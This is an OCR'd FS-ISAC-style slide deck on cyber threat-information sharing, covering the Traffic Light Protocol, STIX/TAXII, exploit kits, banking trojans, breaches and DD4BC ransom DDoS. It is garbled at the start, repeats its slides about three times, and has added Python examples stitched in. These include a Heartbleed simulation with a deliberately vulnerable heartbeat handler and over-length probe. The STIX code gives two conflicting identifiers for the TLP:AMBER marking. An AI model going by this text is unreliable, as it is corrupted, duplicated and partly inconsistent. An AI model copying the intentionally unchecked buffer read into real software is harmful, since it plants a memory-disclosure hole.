15 decrease in avg aOack Mme35 increase in total DDoS aOacks 42 increase in SSDP DDoS aOacks (routers) 22 increase in aplicaMon layer DDoS aOacks 7 decrease in average aOack bandwidth (170 Gbps) 37 increase in infrastructure layer DDoS aOacks Akamai

  

    

  

  

Wiper Malware Oslash Shamoon ndash 2012

Oslash ANack on 30000 Saudi Aramco WorkstaMons Oslash Corrupts files and wipes devices

Oslash South Korean ANacksndash13 2013 Oslash 2 banks media company and insurance company Oslash Patch systems targeted and used to infect13 Oslash Wiped windows Linux and UNIX13 OS

Oslash Las Vegas13 Casinondash 2014 Oslash Wiped and destroyed files with VB bomb

Oslash Sony ndash 2014 Oslash SMB Worm13 Tool listening implant backdoor proxy

tool destrucMve hard drive tool destrucMve targeted cleaning tool network propogaMon wiper

Oslash Financial data destroyed financial system13 sMll inoperable ndash asks for delay in filing

    

The Media and Vendors MalverMsing Watering Holes

Syrian Electronic13 Army

Media Vendor Spin Incidents

bull HeartBleed13 Open SSL bull Hedge Fund ANack -shy‐ BAEbull Russians ANack Financial System13 bull Russians Hack 14 Billion Passwords -shy‐ Hold Security

     

Other13 Threats

bull Call Center ndash Phishing bull Mobile bull Social Media ndash Sony ExecuMve on American Airlines bull Industrial Control Systems -shy‐ Havex bull Espionage ndash VirusTotal tesMng for malware

Case Studies

   

DDoS ndash DD4BC

Since April 2015 bullSubject Line bullFrom From DD4BC Team ltd4bct[AT]gmail[]comgt bullSubject DDOS ATTACK

Size 500 Mbps to 50 Gbps Duration Up to 1 hour Ransom Demand 25-40 BTC

UnitedNYSE

NYSE July 8 2015 1132am 1145am chatter Noon definitive word

UNITED 826 am Reservation System

United13 Parcel13 Service

bull USSS NCCIC FS-shy‐ISAC ndashCollaborate to releasemalware analysis and risk miMgaMon recommendaMons

bull Shared with Retailers AssociaKon

bull UPS Detected13 and used13 to miKgate Malware

QuesKons

Page 13: Case Studies in ISAC Information Sharing

Points of Engagement

• National Infrastructure Coordinating Center (NICC)

• National Cybersecurity and Communications Integration Center (NCCIC)
  – DHS-led Unified Operations Watch & Warning Center
  – Operates 24 hours/day, 7 days/week, 365 days a year

• Unified Command Group – composed of private and public sector representatives
  – Meet monthly and during an incident as needed
  – Advise the Assistant Secretary of CS&C on cybersecurity matters; provide subject matter expertise and response as necessary during an incident that requires national coordination

www.nationalcouncilofisacs.org | nationalcouncilofisacs@natlisacs.org

Information Sharing: Value, Structure, Trust

Information Sharing: Traffic Light Protocol

• RED – Restricted to a defined group (e.g. only those present in a meeting). Information labeled RED should not be shared with anyone outside of the group.

• AMBER – This information may be shared with FS-ISAC members.

• GREEN – Information may be shared with FS-ISAC members and partners (e.g. vendors, MSSPs, customers). Information in this category is not to be shared in public forums.

• WHITE – This information may be shared freely and is subject to standard copyright rules.

Types of Information Shared: Cyber Threats, Vulnerabilities, Incidents

✓ Malicious Sites
✓ Threat Actors, Objectives
✓ Threat Indicators
✓ TTPs, Observables
✓ Courses of Action
✓ Exploit Targets
✓ Denial of Service Attacks
✓ Malicious Emails: Phishing, Spearphishing
✓ Software Vulnerabilities
✓ Malicious Software
✓ Analysis and risk mitigation
✓ Incident response

   

Primary Ways Information Is Shared

✓ Portal/Alerts
✓ Listservers
✓ Automation

Sample of Sharing Thread

"Received close to 500 so far and still coming in; 90 made it through to employees before being blocked by perimeter as spam."

"Subject: Important message from BANK. Sender: youraccount@BANKmessage.com. URL: hxxp://www2.webmasterradio.fm/FanPage/Procss/Logon.html"

"0 hits last 7 days."

"We've had about 50 hits so far, all are discarded."

TLP AMBER – PROPRIETARY INFORMATION

"BANK: Submitted a takedown request for the phishing site."
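The thread above is members reporting how many of the shared phishing messages reached them. As an added illustration (not from the deck), the following Python matches the indicators quoted in the thread against a constructed mail-gateway log and produces the kind of hit count a member would post back; the log format, the field names and the log lines are this example's own.

```python
"""
Added example (not from the slide deck): answering a "how many hits are you
seeing?" thread by matching the shared phishing indicators against a
mail-gateway log.  The log format, field names and log lines below are
constructed for this example; the indicator values are the ones the thread quotes.
"""
from collections import Counter

# Indicators quoted in the sharing thread (URL kept defanged, as on the slide).
INDICATORS = {
    "subject": "Important message from BANK",
    "sender": "youraccount@BANKmessage.com",
    "url": "hxxp://www2.webmasterradio.fm/FanPage/Procss/Logon.html",
}

# Constructed mail-gateway log, pipe-separated, one message per line:
# timestamp | gateway action | sender | subject | first URL found in the body
SAMPLE_LOG = """\
2015-07-08T08:01:12|delivered|youraccount@BANKmessage.com|Important message from BANK|hxxp://www2.webmasterradio.fm/FanPage/Procss/Logon.html
2015-07-08T08:01:40|quarantined|youraccount@BANKmessage.com|Important message from BANK|hxxp://www2.webmasterradio.fm/FanPage/Procss/Logon.html
2015-07-08T08:02:05|delivered|billing@example.net|Your July invoice|hxxp://billing.example.net/inv/7781
2015-07-08T08:03:19|quarantined|alerts@example.org|Important message from BANK|hxxp://www2.webmasterradio.fm/FanPage/Procss/Logon.html
2015-07-08T08:04:50|delivered|news@example.com|Weekly digest|-
"""


def parse_log(text):
    """Turn the constructed log into dicts; blank or malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split("|")
        if len(parts) != 5:
            continue
        ts, action, sender, subject, url = parts
        records.append({"ts": ts, "action": action, "sender": sender,
                        "subject": subject, "url": url})
    return records


def matches(record, indicators):
    """A message is a hit if its subject, sender or URL equals a shared indicator.
    Subject and sender compare case-insensitively; the URL compares exactly."""
    return (record["subject"].lower() == indicators["subject"].lower()
            or record["sender"].lower() == indicators["sender"].lower()
            or record["url"] == indicators["url"])


def summarize_hits(records, indicators):
    """Count hits by gateway action, the way replies in the thread report them."""
    counts = Counter(r["action"] for r in records if matches(r, indicators))
    total = sum(counts.values())
    return {"hits": total,
            "delivered": counts["delivered"],
            "blocked": total - counts["delivered"]}


def thread_reply(summary):
    """Format the summary as a one-line reply to the sharing thread."""
    return (f"{summary['hits']} hits so far, {summary['delivered']} made it "
            f"through to employees, {summary['blocked']} blocked at the perimeter")


if __name__ == "__main__":
    print(thread_reply(summarize_hits(parse_log(SAMPLE_LOG), INDICATORS)))
```

Matching on any one of the three indicators is deliberate: the fourth log line reuses the subject from a different sender, which is exactly the case a sender-only match would miss.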

Sample of ISAC Sharing

Indicators of Compromise: IP Address, Subject Line, MD5, TTP, Malware

Ask a question: "Anyone else seeing…?" "What do you do in this situation?" "How do you handle…?"

Share a Best Practice: "Here's how we…"

Share a Mitigation Strategy: "Here's a script you can use…" "We did this…"

TLP AMBER – PROPRIETARY INFORMATION

A Common Language

§ Structured Threat Information Expression (STIX) is a common language, a way for all to speak the same

Trusted Automated eXchange of Indicator Information (TAXII)

§ The goal of TAXII is to facilitate the exchange of structured cyber threat information
§ Designed to support existing sharing paradigms in a more automated manner
§ TAXII is a set of specifications defining the network-level activity of the exchange
§ Defines services and messages to exchange data
§ Does NOT dictate HOW data is handled in the back-end, WHAT data is shared, or WHO it is shared with
§ TAXII is NOT a sharing program
§ TAXII is a protocol over which STIX can be transported
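To make the STIX/TAXII and Traffic Light Protocol points concrete, the following added Python (not from the deck, and not the STIX or TAXII projects' own code) packages the phishing indicator from the sharing thread as a STIX 2.1 Indicator carrying a TLP marking, and applies the slide's TLP sharing rules before objects would be handed to a TAXII client. It assumes the STIX 2.1 JSON layout and that spec's fixed TLP marking-definition ids; the audience labels (group, member, partner, public) are this example's own.

```python
"""
Added example (not from the slide deck, not the STIX/TAXII projects' code):
a STIX 2.1 Indicator with a TLP marking, plus a sharing gate that enforces the
slide's Traffic Light Protocol rules.  Assumes the STIX 2.1 JSON layout and the
spec's fixed TLP marking ids; audience names are this example's own.
"""
import json
import uuid
from datetime import datetime, timezone

# Fixed marking-definition ids that the STIX 2.1 spec assigns to the TLP levels.
TLP_MARKING = {
    "RED":   "marking-definition--5e57c739-391a-4eb3-b6be-7d15ca92d5ed",
    "AMBER": "marking-definition--f88d31f6-dadc-4438-9b3f-4cc1f3e0c3a6",
    "GREEN": "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da",
    "WHITE": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
}
MARKING_TO_TLP = {v: k for k, v in TLP_MARKING.items()}

# Who may receive each level, following the slide's TLP definitions
# (audience labels are this example's own assumption).
TLP_AUDIENCE = {
    "RED":   {"group"},                                 # the defined group only
    "AMBER": {"group", "member"},                       # FS-ISAC members
    "GREEN": {"group", "member", "partner"},            # members and partners
    "WHITE": {"group", "member", "partner", "public"},  # anyone
}


def _now():
    return datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.000Z")


def make_indicator(name, pattern, tlp, created=None):
    """Build a STIX 2.1 Indicator object that references a TLP marking."""
    ts = created or _now()
    return {
        "type": "indicator",
        "spec_version": "2.1",
        "id": f"indicator--{uuid.uuid4()}",
        "created": ts,
        "modified": ts,
        "name": name,
        "indicator_types": ["malicious-activity"],
        "pattern": pattern,
        "pattern_type": "stix",
        "valid_from": ts,
        "object_marking_refs": [TLP_MARKING[tlp]],
    }


def make_bundle(objects):
    """Wrap objects in a STIX Bundle, the unit a TAXII collection serves."""
    return {"type": "bundle", "id": f"bundle--{uuid.uuid4()}", "objects": list(objects)}


def tlp_of(obj):
    """Return the TLP level of an object, or None if it carries no TLP marking."""
    for ref in obj.get("object_marking_refs", []):
        if ref in MARKING_TO_TLP:
            return MARKING_TO_TLP[ref]
    return None


def may_share(obj, audience):
    """Sharing gate: an unmarked object is treated as RED (most restrictive), never as free."""
    level = tlp_of(obj) or "RED"
    return audience in TLP_AUDIENCE[level]


def release_for(objects, audience):
    """Filter a set of objects down to what a given audience may receive."""
    return [o for o in objects if may_share(o, audience)]


# Indicator values quoted in the sharing thread, as a STIX pattern on the email message.
PHISH_PATTERN = ("[email-message:subject = 'Important message from BANK' AND "
                 "email-message:from_ref.value = 'youraccount@BANKmessage.com']")

if __name__ == "__main__":
    ind = make_indicator("BANK phishing campaign", PHISH_PATTERN, "AMBER")
    print(json.dumps(make_bundle([ind]), indent=2))
    for who in ("member", "partner", "public"):
        print(who, "->", may_share(ind, who))
```

Unmarked objects fall to RED on purpose: a missing marking is far more likely to be an omission than an intent to publish, and the gate sits in front of TAXII precisely because TAXII itself does not decide who receives what.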

What is Cyber Threat Intelligence? The 8 Constructs of STIX

Levels of intelligence: Atomic, Tactical, Operational, Strategic

Questions the constructs answer:
• What threat activity are we seeing?
• What threats should I look for on my networks and systems, and why?
• Where has this threat been seen?
• What weaknesses does it exploit?
• What can I do about it?
• Who is responsible for this threat?
• Why do they do this?
• What do they do?

Threats Seen

Cyber Threat Environment

• Actors
  – Nation States
  – Terrorists
  – Criminals
  – Insiders
  – Activists/Hacktivists
  – Media
  – Vendors

Seen Last Week…
• Nuclear Exploit Kit
• OpenVAS Scanning
• Angler/Neutrino
• PlugX
• DDoS
• Dridex
• Upatre/Dyre

Malware – Exploit Kits: Top Exploit Kits Seen

• Blackhole EK – Paunch (10/13)
• Infinity EK – Flash player exploit
• Neutrino EK – Mixes legitimate and non-legitimate requests to obfuscate the code
• Magnitude EK – Ransomware
• Sweet Orange EK – Website
• Fiesta EK – Silverlight
• Angler EK – Hides behind legitimate web code
• Crimeboss EK – Java exploits

Ransomware

– CryptoLocker
– CryptoWall
– CryptoDefense
– TorrentLocker
– Darkleech

Top infections: USA, Canada, UK, India. Also saw a Singapore trend.

Delivery Mechanisms: Phishing/Spearphishing

Themes: Court Notice; Invoice/Statement; Shipping themes (DHL, FedEx, UPS); EZ Pass; Bank Phish – Swift Transfer; Dhgate invoice; eFax; Salesforce; Reward themes; Airline – Delta; WhatsApp – "You've got a voicemail"

Malware – Banking Trojans: Top Trojans Seen

Citadel; Kronos; Kuluoz – Asprox; Carberp; Zeus; Zberp – hybrid; Game-over Zeus (GOZ) – P2P (arj) 9/14; Cridex – Bugat, Feodo, Dridex; Dyre; Shylock – July 2014 Takedown

Dyre Spreads Like A Global Virus…

June 2014: UK, US
September 2014: Salesforce.com attacked
October 2014: Romania, Germany and Switzerland
November 2014: Over 100 firms targeted
December 2014: Australia and China

Delivery Mechanisms: Drive-by Downloads and Watering Holes

Forbes.com, Energystar.com, AusPost-tracking.com, VA.gov, NBC.com – Citadel 2013

  

Vulnerability Scanning

• Port Scans – Open ports
• Vulnerability Scans – WordPress, Joomla, Java, Flash, OpenSSL
• Infrastructure

Vulnerabilities

• OpenSSL/Heartbleed
  – Old vulnerability
  – Allows more data than allowed to be read
  – Website vulnerability
  – Banks took rap unfairly

• GNU Bash/Shellshock
  – Old vulnerability (1994)
  – Unix based: Linux, Apple Mac OS X
  – Went public Wednesday 9/24
  – Exploits and scanning seen almost immediately

      

   

Breaches – Malware: ChewBacca, Dexter, BlackPOS, Backoff

Ø Target 70 million – 2013
Ø OPM 21.5 million
Ø Premera BCBS 11.2 million
Ø Community Health Systems 4.5 million
Ø Anthem BCBS 80 million
Ø Sony/Hacking Team

2015 Breaches Identified by the ITRC as of 8/11/2015

• Total Breaches: 5,500 approx.
• Total Records Exposed: 818,004,561
• Identity Theft Resource Center

      

DDoS

Ø Sony PlayStation – Lizard Squad
Ø Operation Ababil
Ø Las Vegas – Gaming Industry
Ø Israel
Ø DD4BC
Ø World Cup

Q1 2015 Compared to Q4 2014 (Akamai)

• 15% decrease in avg attack time
• 35% increase in total DDoS attacks
• 42% increase in SSDP DDoS attacks (routers)
• 22% increase in application layer DDoS attacks
• 7% decrease in average attack bandwidth (170 Gbps)
• 37% increase in infrastructure layer DDoS attacks

  

    

  

  

Wiper Malware

Ø Shamoon – 2012
  Ø Attack on 30,000 Saudi Aramco workstations
  Ø Corrupts files and wipes devices

Ø South Korean Attacks – 2013
  Ø 2 banks, media company and insurance company
  Ø Patch systems targeted and used to infect
  Ø Wiped Windows, Linux and UNIX OS

Ø Las Vegas Casino – 2014
  Ø Wiped and destroyed files with VB bomb

Ø Sony – 2014
  Ø SMB Worm Tool: listening implant, backdoor, proxy tool, destructive hard drive tool, destructive targeted cleaning tool, network propagation wiper
  Ø Financial data destroyed; financial system still inoperable – asks for delay in filing

    

The Media and Vendors

Malvertising, Watering Holes, Syrian Electronic Army

Media/Vendor Spin Incidents

• HeartBleed / OpenSSL
• Hedge Fund Attack – BAE
• Russians Attack Financial System
• Russians Hack 1.4 Billion Passwords – Hold Security

Other Threats

• Call Center – Phishing
• Mobile
• Social Media – Sony Executive on American Airlines
• Industrial Control Systems – Havex
• Espionage – VirusTotal testing for malware

Case Studies

DDoS – DD4BC

Since April 2015
• From: DD4BC Team <d4bct[AT]gmail[.]com>
• Subject: DDOS ATTACK

Size: 500 Mbps to 50 Gbps
Duration: Up to 1 hour
Ransom Demand: 25-40 BTC

United/NYSE

NYSE – July 8, 2015: 11:32am, 11:45am chatter; Noon definitive word
UNITED – 8:26 am: Reservation System

United Parcel Service

• USSS, NCCIC, FS-ISAC – Collaborate to release malware analysis and risk mitigation recommendations
• Shared with Retailers Association
• UPS detected and used to mitigate malware

Questions




Page 17: Case Studies in ISAC Information Sharing

Types of Information Shared: Cyber Threats, Vulnerabilities, Incidents

• Malicious Sites
• Threat Actors / Objectives
• Threat Indicators
• TTPs, Observables
• Courses of Action
• Exploit Targets
• Denial of Service Attacks
• Malicious Emails: Phishing, Spearphishing
• Software Vulnerabilities
• Malicious Software
• Analysis and risk mitigation
• Incident response

Primary Ways Information Is Shared

• Portal / Alerts
• Listservers
• Automation

Sample of Sharing Thread

Received close to 500 so far and still coming in. 90 made it through to employees before being blocked by the perimeter as spam.

Subject: Important message from BANK
Sender: youraccount@BANKmessage[.]com
URL: hxxp://www2.webmasterradio[.]fm/FanPage/Procss/Logon.html

0 hits last 7 days.

We've had about 50 hits so far, all are discarded.

TLP: AMBER - PROPRIETARY INFORMATION

BANK: Submitted a takedown request for the phishing site.

Sample of ISAC Sharing

Indicators of Compromise: IP Address, Subject Line, MD5, TTP, Malware

Ask a question: "Anyone else seeing...?" "What do you do in this situation?" "How do you handle...?"

Share a Best Practice: "Here's how we..."

Share a Mitigation Strategy: "Here's a script you can use..." "We did this..."

TLP: AMBER - PROPRIETARY INFORMATION
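What a member does with the indicators from a thread like the one above, as an added example that is not part of the deck: refang the shared sender, subject and URL, run them over the mail gateway's logs, and split the hits into blocked-at-perimeter versus delivered, which is the number the thread replies report. The key=value log format and every address, host and timestamp in the sample are constructed for this example.

```python
import re
from collections import Counter
from typing import Dict, List, Optional

# Indicators as they arrived in the sharing thread, still defanged by the
# poster (hxxp, [.]). The values are the ones quoted in the thread.
SHARED_INDICATORS = {
    "sender": "youraccount@BANKmessage[.]com",
    "subject": "Important message from BANK",
    "url": "hxxp://www2.webmasterradio[.]fm/FanPage/Procss/Logon.html",
}

# Constructed mail-gateway log lines in a hypothetical key=value format; the
# recipients, the vendor host and the timestamps are made up for this example.
SAMPLE_LOG = """
2015-08-10T09:12:03Z action=quarantine reason=spam from=youraccount@BANKmessage.com to=alice@example.org subject="Important message from BANK" url=http://www2.webmasterradio.fm/FanPage/Procss/Logon.html
2015-08-10T09:12:09Z action=deliver from=youraccount@BANKmessage.com to=bob@example.org subject="Important message from BANK" url=http://www2.webmasterradio.fm/FanPage/Procss/Logon.html
2015-08-10T10:01:44Z action=deliver from=newsletter@vendor.example to=bob@example.org subject="August update" url=http://vendor.example/news
2015-08-10T10:30:00Z action=quarantine reason=spam from=promo@bankmessage.com to=carol@example.org subject="Important Message From BANK" url=http://www2.webmasterradio.fm/fanpage/procss/logon.html
"""

LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<rest>.*)$")
KV_PAIR = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def refang(value: str) -> str:
    """Undo the defanging conventions used in the thread so an indicator can be
    compared with what the gateway actually logged."""
    value = re.sub(r"^hxxp", "http", value, flags=re.IGNORECASE)
    return value.replace("[.]", ".").replace("[AT]", "@").replace("[at]", "@")


def normalise_url(url: str) -> str:
    """Lower-case and drop scheme and trailing slash. URL paths are technically
    case-sensitive; we accept that to catch trivially re-cased copies of a lure."""
    url = refang(url).lower()
    return url.split("://", 1)[-1].rstrip("/")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    match = LOG_LINE.match(line.strip())
    if not match:
        return None
    fields = {key: (quoted or bare) for key, quoted, bare in KV_PAIR.findall(match.group("rest"))}
    fields["ts"] = match.group("ts")
    return fields


def indicator_hits(event: Dict[str, str], indicators: Dict[str, str]) -> set:
    """Which of the shared indicators this one gateway event matches."""
    hits = set()
    if event.get("from", "").lower() == refang(indicators["sender"]).lower():
        hits.add("sender")
    if event.get("subject", "").lower() == indicators["subject"].lower():
        hits.add("subject")
    if "url" in event and normalise_url(event["url"]) == normalise_url(indicators["url"]):
        hits.add("url")
    return hits


def tally(lines: List[str], indicators: Dict[str, str]) -> dict:
    """Count matching messages and separate those blocked at the perimeter from
    those delivered to a mailbox; the delivered ones need user follow-up."""
    summary = {"hits": 0, "blocked": 0, "delivered": 0,
               "by_indicator": Counter(), "delivered_to": []}
    for line in lines:
        event = parse_line(line)
        if event is None:
            continue
        hits = indicator_hits(event, indicators)
        if not hits:
            continue
        summary["hits"] += 1
        summary["by_indicator"].update(hits)
        if event.get("action") == "deliver":
            summary["delivered"] += 1
            summary["delivered_to"].append(event.get("to"))
        else:
            summary["blocked"] += 1
    return summary


if __name__ == "__main__":
    result = tally(SAMPLE_LOG.splitlines(), SHARED_INDICATORS)
    print(f"{result['hits']} hits: {result['blocked']} blocked at perimeter, "
          f"{result['delivered']} delivered to {result['delivered_to']}")
```

The fourth sample line is the case a plain string match misses: a different sender reusing the same lure URL with the path re-cased. Matching on each indicator separately, and reporting which one fired, is what lets the reply to the thread say "URL seen, sender not" rather than just a hit count.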

A Common Language

• Structured Threat Information Expression (STIX) is a common language, a way for all to speak the same

Trusted Automated eXchange of Indicator Information (TAXII)

• The goal of TAXII is to facilitate the exchange of structured cyber threat information
• Designed to support existing sharing paradigms in a more automated manner
• TAXII is a set of specifications defining the network-level activity of the exchange
• Defines services and messages to exchange data
• Does NOT dictate HOW data is handled in the back-end, WHAT data is shared or WHO it is shared with
• TAXII is NOT a sharing program
• TAXII is a protocol over which STIX can be transported

What is Cyber Threat Intelligence? 8 Constructs of STIX

Atomic / Tactical / Operational / Strategic

• What threat activity are we seeing?
• What threats should I look for on my networks and systems, and why?
• Where has this threat been seen?
• What weaknesses does it exploit?
• What can I do about it?
• Who is responsible for this threat?
• Why do they do this?
• What do they do?
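To make the "common language" concrete, here is an added example that is not from the deck (which predates STIX 2): it encodes the thread's phishing indicator as a STIX 2.1 Indicator object, marks it TLP:AMBER using the marking-definition ids fixed by the STIX 2.1 specification, checks the TLP audience before the object is passed on, and builds the TAXII 2.1 "add objects" request that carries it. The TAXII server URL and collection id are hypothetical.

```python
import json
import uuid
from datetime import datetime, timezone
from typing import Dict, List

# TLP marking-definition identifiers are fixed by the STIX 2.1 specification,
# so every consumer recognises them without first exchanging marking objects.
TLP_MARKING = {
    "WHITE": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
    "GREEN": "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da",
    "AMBER": "marking-definition--f88d31f6-486f-44da-b317-01333bde0b82",
    "RED": "marking-definition--5e57c739-391a-4eb3-b6be-7d15ca92d5ed",
}

# Who each TLP level may be passed on to (TLP 1.0 audiences).
TLP_AUDIENCE = {
    "WHITE": {"public", "community", "own-org", "named-recipient"},
    "GREEN": {"community", "own-org", "named-recipient"},
    "AMBER": {"own-org", "named-recipient"},
    "RED": {"named-recipient"},
}

TAXII_MEDIA_TYPE = "application/taxii+json;version=2.1"


def stix_timestamp() -> str:
    """RFC 3339 UTC timestamp at millisecond precision, as STIX uses."""
    now = datetime.now(timezone.utc)
    return now.strftime("%Y-%m-%dT%H:%M:%S.") + f"{now.microsecond // 1000:03d}Z"


def quote_literal(value: str) -> str:
    """Escape a value for use inside a single-quoted STIX pattern literal."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def phishing_indicator(sender: str, subject: str, url: str, tlp: str = "AMBER") -> Dict:
    """STIX 2.1 Indicator for the BANK phish: the e-mail (sender AND subject)
    OR the lure URL, so a match on either observation counts as a hit."""
    pattern = (
        f"[email-message:from_ref.value = '{quote_literal(sender)}' AND "
        f"email-message:subject = '{quote_literal(subject)}'] "
        f"OR [url:value = '{quote_literal(url)}']"
    )
    ts = stix_timestamp()
    return {
        "type": "indicator",
        "spec_version": "2.1",
        "id": f"indicator--{uuid.uuid4()}",
        "created": ts,
        "modified": ts,
        "name": "BANK-themed credential phishing e-mail",
        "indicator_types": ["malicious-activity"],
        "pattern": pattern,
        "pattern_type": "stix",
        "valid_from": ts,
        "object_marking_refs": [TLP_MARKING[tlp]],
    }


def make_bundle(objects: List[Dict]) -> Dict:
    """STIX 2.1 Bundle: a transport wrapper with no semantics of its own."""
    return {"type": "bundle", "id": f"bundle--{uuid.uuid4()}", "objects": objects}


def tlp_of(obj: Dict) -> str:
    """Read the TLP level off an object's markings. Unmarked objects are treated
    as RED so a missing label never widens distribution."""
    refs = set(obj.get("object_marking_refs", []))
    for level, marking_id in TLP_MARKING.items():
        if marking_id in refs:
            return level
    return "RED"


def may_share(obj: Dict, audience: str) -> bool:
    return audience in TLP_AUDIENCE[tlp_of(obj)]


def taxii_add_objects_request(api_root: str, collection_id: str, objects: List[Dict]) -> Dict:
    """The HTTP request a TAXII 2.1 client sends to push objects into a
    collection: a POST of an envelope to the collection's objects endpoint."""
    return {
        "method": "POST",
        "url": f"{api_root.rstrip('/')}/collections/{collection_id}/objects/",
        "headers": {"Content-Type": TAXII_MEDIA_TYPE, "Accept": TAXII_MEDIA_TYPE},
        "body": json.dumps({"objects": objects}),
    }


if __name__ == "__main__":
    indicator = phishing_indicator(
        "youraccount@BANKmessage.com", "Important message from BANK",
        "http://www2.webmasterradio.fm/FanPage/Procss/Logon.html")
    print(json.dumps(make_bundle([indicator]), indent=2))
    # Hypothetical TAXII server and collection id, for illustration only.
    print(taxii_add_objects_request("https://taxii.example/api1", "phish", [indicator])["url"])
    for audience in ("own-org", "community", "public"):
        print(audience, may_share(indicator, audience))
```

The marking travels with the object, which is the point of a common language: a downstream tool can refuse to re-post a TLP:AMBER indicator to a public feed without reading the thread it came from. Note what TAXII does not do here, exactly as the slide says: nothing in the request decides who else gets the object or how the receiving side stores it.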

Threats Seen

Cyber Threat Environment

• Actors: Nation States, Terrorists, Criminals, Insiders, Activists/Hacktivists, Media, Vendors

Seen Last Week...

• Nuclear Exploit Kit
• OpenVAS Scanning
• Angler / Neutrino
• PlugX
• DDoS
• Dridex
• Upatre / Dyre

Malware - Exploit Kits: Top Exploit Kits Seen

• Blackhole EK – Paunch (10/13)
• Infinity EK – Flash player exploit
• Neutrino EK – mixes legitimate and non-legitimate requests to obfuscate the code
• Magnitude EK – Ransomware
• Sweet Orange EK – Website
• Fiesta EK – Silverlight
• Angler EK – hides behind legitimate web code
• Crimeboss EK – Java exploits

Ransomware

• CryptoLocker
• CryptoWall
• CryptoDefense
• TorrentLocker
• Darkleech

Top infections: US, AU, Canada, UK, India. Also saw a Singapore trend.

Delivery Mechanisms: Phishing / Spearphishing

Themes: Court Notice; Invoice / Statement; Shipping (DHL, FedEx, UPS); EZ Pass; Bank Phish – Swift Transfer; DHgate invoice; eFax; Salesforce; Reward themes; Airline – Delta; WhatsApp – "You've got a voicemail"

Malware - Banking Trojans: Top Trojans Seen

• Citadel
• Kronos
• Kuluoz – Asprox
• Carberp
• Zeus
• Zberp – hybrid
• Gameover Zeus (GOZ) – P2P (arj), 9/14
• Cridex – Bugat, Feodo, Dridex
• Dyre
• Shylock – July 2014 Takedown

Dyre Spreads Like A Global Virus...

• June 2014: UK, US
• September 2014: Salesforce.com attacked
• October 2014: Romania, Germany and Switzerland
• November 2014: Over 100 firms targeted
• December 2014: Australia and China

Delivery Mechanisms: Drive-by Downloads and Watering Holes

Forbes.com, Energystar.com, AusPost-tracking.com, VA.gov, NBC.com – Citadel 2013


Vulnerability Scanning

• Port Scans – Open ports
• Vulnerability Scans – WordPress, Joomla, Java, Flash, OpenSSL
• Infrastructure

Vulnerabilities

• OpenSSL / Heartbleed
  – Old vulnerability
  – Allows more data than allowed to be read
  – Website vulnerability
  – Banks took rap unfairly
• GNU Bash / Shellshock
  – Old vulnerability (1994)
  – Unix based: Linux, Apple Mac OS X
  – Went public Wednesday 9/24
  – Exploits and scanning seen almost immediately
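The Heartbleed bullet ("allows more data than allowed to be read") worked through in Python, as an added simulation that is not OpenSSL's code: a TLS heartbeat record is a one-byte type, a two-byte payload length, the payload and at least 16 bytes of padding. The pre-1.0.1g handler copied payload_length bytes back without checking that the record actually contained them; the 1.0.1g fix discards the message when 1 + 2 + payload_length + 16 exceeds the length of the record received. The process memory, and the secret placed after the record inside it, are constructed for this example.

```python
import struct
from typing import Optional

HEARTBEAT_REQUEST = 1
MIN_PADDING = 16  # RFC 6520: at least 16 bytes of random padding


def build_heartbeat(payload: bytes, claimed_length: Optional[int] = None) -> bytes:
    """Heartbeat message: type (1) | payload_length (2, big-endian) | payload | padding.
    An honest peer sets payload_length to len(payload); the Heartbleed probe
    claims up to 65535 bytes while sending only a few."""
    length = len(payload) if claimed_length is None else claimed_length
    return struct.pack("!BH", HEARTBEAT_REQUEST, length) + payload + b"\x00" * MIN_PADDING


def heartbeat_vulnerable(memory: bytes, record_length: int) -> Optional[bytes]:
    """Pre-1.0.1g behaviour: trusts the length field inside the message."""
    hb_type, payload_length = struct.unpack("!BH", memory[:3])
    if hb_type != HEARTBEAT_REQUEST:
        return None
    # Bug: payload_length is never compared with record_length, so the copy
    # runs past the end of the record into whatever follows it in memory.
    return memory[3:3 + payload_length]


def heartbeat_fixed(memory: bytes, record_length: int) -> Optional[bytes]:
    """OpenSSL 1.0.1g behaviour: bound the copy by the record actually received."""
    if 1 + 2 + MIN_PADDING > record_length:
        return None  # silently discard: too short to be a valid heartbeat
    hb_type, payload_length = struct.unpack("!BH", memory[:3])
    if hb_type != HEARTBEAT_REQUEST:
        return None
    if 1 + 2 + payload_length + MIN_PADDING > record_length:
        return None  # silently discard: claimed payload does not fit in the record
    return memory[3:3 + payload_length]


# Constructed stand-in for the server's heap: the heartbeat record sits first,
# followed by data the peer must never see (a made-up cookie and credential).
SECRET = b"Cookie: session=8f2c1a9e0d4b7c3f; Authorization: Basic YWRtaW46aHVudGVyMg=="


def simulate(handler, claimed_length: Optional[int]) -> Optional[bytes]:
    """Send a 4-byte 'ping' heartbeat, optionally lying about its length."""
    record = build_heartbeat(b"ping", claimed_length)
    memory = record + b"\x00" * 32 + SECRET + b"\x00" * 70000
    return handler(memory, len(record))


def leaks_secret(handler, claimed_length: Optional[int]) -> bool:
    reply = simulate(handler, claimed_length)
    return reply is not None and SECRET in reply


if __name__ == "__main__":
    print("honest request, vulnerable:", simulate(heartbeat_vulnerable, None))
    print("honest request, fixed:     ", simulate(heartbeat_fixed, None))
    print("65535-byte probe, vulnerable leaks secret:", leaks_secret(heartbeat_vulnerable, 65535))
    print("65535-byte probe, fixed leaks secret:     ", leaks_secret(heartbeat_fixed, 65535))
```

The honest request behaves identically on both handlers, which is why the bug survived two years: nothing in normal traffic exercises the missing check. Only a request whose claimed length exceeds the record exposes the difference, and the fixed handler answers it with silence rather than an error, matching the 1.0.1g patch.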

      

   

Breaches

Malware: ChewBacca, Dexter, BlackPOS, Backoff

• Target – 70 million (2013)
• OPM – 21.5 million
• Premera BCBS – 11.2 million
• Community Health Systems – 4.5 million
• Anthem BCBS – 80 million
• Sony / Hacking Team

2015 Breaches Identified by the ITRC as of 8/11/2015

• Total Breaches: 5500 approx
• Total Records Exposed: 818,004,561
• Source: Identity Theft Resource Center

DDoS

• Sony PlayStation – Lizard Squad
• Operation Ababil
• Las Vegas – Gaming Industry
